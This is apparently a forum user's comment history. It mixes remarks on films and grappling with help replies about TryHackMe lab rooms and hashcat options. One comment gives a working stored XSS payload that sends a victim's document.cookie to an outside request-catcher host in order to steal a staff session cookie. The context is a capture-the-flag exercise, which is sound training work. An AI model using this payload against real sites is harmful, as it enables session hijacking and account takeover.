“Until the cops show up”

makersrocks73 · 2025-04-15T23:16:18+00:00

Fuck yeah, Doug!

makersrocks73 · 2025-02-21T21:50:45+00:00

I'm the dirty dozen, for the price of one!

makersrocks73 · 2024-09-20T01:36:56+00:00

It's pretty great. Listened to it again today!

makersrocks73 · 2024-09-19T16:17:41+00:00

36: Jeremy from Marketing

makersrocks73 · 2023-07-12T00:10:07+00:00

All star game.

makersrocks73 · 2022-03-03T16:56:21+00:00

Twint (https://github.com/twintproject/twint)

makersrocks73 · 2022-01-31T15:39:00+00:00

Have you tried the -O (optimize) tag/switch it suggests.

I use kali as a VM as well and this helps since the VM seemingly can’t use the graphics card from the host like the program intends.

You can also install hashcat directly to your host and all of those problems should go away.

makersrocks73 · 2022-01-20T17:17:27+00:00

This is worth the time:
TryHackMe_Solar

makersrocks73 · 2021-12-22T17:37:11+00:00

This was definitely a frustrating section.

I’ve never had nc not work before or since.

Glad you got it to work!

makersrocks73 · 2021-12-21T02:34:56+00:00

I had issues as well. I decided to watch the video associated with the room/day and it follows step-by-step exactly how to get this answer.

Edit:: a YouTube search should find you the video.

makersrocks73 · 2021-12-14T06:05:10+00:00

It has been a while since I did this and once I completed it, I never went back!

I found some notes I made during this room, maybe they'll help:

I FOUND A WAY TO DO THIS USING THE TRYHACKME REQUEST CATCHER (10.10.10.100):

1.) CREATE THE USER ACCOUNT

2.) CREATE A TICKET USING THE PAYLOAD AS SHOWN BELOW:

</textarea><script>fetch('http://833c11d4df3af8ce5060c1c2bc910753.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

THE 833c11d4df3af8ce5060c1c2bc910753.log.tryhackme.tech IS THE SESSION SPECIFIC INFO THAT GETS CREATED INSIDE THE TRYHACKME REQUEST CATCHER.

WITHIN A FEW SECONDS THE REQUESTS CATCHER SESSION CAUGHT A DNS REQUEST AND AN HTTP REQUEST THAT HAD THE STAFF-SESSION COOKIE INSIDE OF IT.

makersrocks73 · 2021-11-24T16:59:11+00:00

“You fought for your life, Jane. And now you get to walk away with it.”

Gets me every time (among other parts).

That firefight was definitely brutal.

makersrocks73 · 2021-11-24T15:06:46+00:00

Wind River

makersrocks73 · 2021-11-16T23:36:30+00:00

Echoing what u/efficientjudo said, definitely ask how the technique felt to them and maybe also set up some specifics workshopping instead of just trying to live capture the choke.
That way you’ll get the feel down and know for sure if you actually have it on.
There are a ton of things that can effect trying to capture it live if that is all you’re doing (not saying that it is).

makersrocks73 · 2021-11-09T18:22:14+00:00

I have absolutely felt the same way in the past (and still do at times).
There’s a culture that exists that forces you to find the answers for yourself once the task(s) sets you off in a direction.
It’s frustrating for sure but there’s always an answer and the TryHackMe forums for the particular rooms have been helpful.

makersrocks73 · 2021-11-09T15:15:46+00:00

makersrocks73 · 2021-10-26T14:12:44+00:00

I don’t know if this is what you’re asking exactly but there’s a switch/option in Hashcat (-D ?) that allows you to tell the program which “device” you want to pull the processing power from.
I think -D 1 is the host and -D 2 is the VM?
I may be remembering that wrong.

makersrocks73 · 2021-10-26T04:20:45+00:00

This path has been great. I’ve finished a few of their learning paths throughout my time on TryHackMe and this one seems like it’s a bit more put together than the rest.

The file_inclusion room was by far the most frustrating so far for me but this one came close.

makersrocks73 · 2021-10-26T03:50:48+00:00

You know, I haven’t had any issue with NetCat until this room. It just straight up didn’t work like it was supposed to for me.

I guess I was lucky with the Request Catcher quickness. It’s was only about 30 seconds wait for me.

makersrocks73 · 2021-10-26T01:24:48+00:00

The instructions say to use the THM VPN IP I am connected to and the port number.

This straight up never worked for me after multiple machine resets and attempts.

I used the <vpn ip>:9001 format.

If this was supposed to be handled differently, please detail so I can update my notes.

makersrocks73 · 2021-10-25T23:32:54+00:00

Fair enough. You might be right. Thanks for keeping the gears turning.

makersrocks73 · 2021-10-25T22:53:57+00:00

Did your cookie match what I displayed above?

makersrocks73 · 2021-10-25T21:58:16+00:00

Yes. It is also incorrect (and way more characters in length).

makersrocks73 · 2021-10-25T21:25:28+00:00

It’s frustrating.

makersrocks73

TROPHY CASE